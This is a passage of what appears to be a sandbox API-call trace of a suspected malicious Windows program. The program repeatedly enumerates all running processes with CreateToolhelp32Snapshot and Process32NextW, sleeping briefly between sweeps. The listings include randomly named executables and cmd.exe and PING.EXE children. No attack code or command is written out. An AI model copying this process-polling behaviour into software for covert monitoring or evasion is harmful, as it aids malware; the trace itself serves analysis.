th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.503] CloseHandle (hObject=0xc4) returned 1 [0102.503] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0102.510] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0102.569] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.571] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.574] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0102.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="fired-isolation-deny.exe")) returned 1 [0102.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.593] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.596] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.598] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.600] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.601] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.603] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.604] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.605] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.606] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.607] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.657] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.658] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.659] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.660] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.661] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.662] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.664] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.665] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.666] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.667] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.668] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.670] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.671] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0102.672] CloseHandle (hObject=0xbc) returned 1 [0102.672] Sleep (dwMilliseconds=0x12c) [0103.035] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0103.040] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 
[0103.044] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.046] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.047] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.048] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.048] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.049] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.050] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.050] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.051] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.051] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.052] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.053] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.054] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.055] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.056] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.057] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.059] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 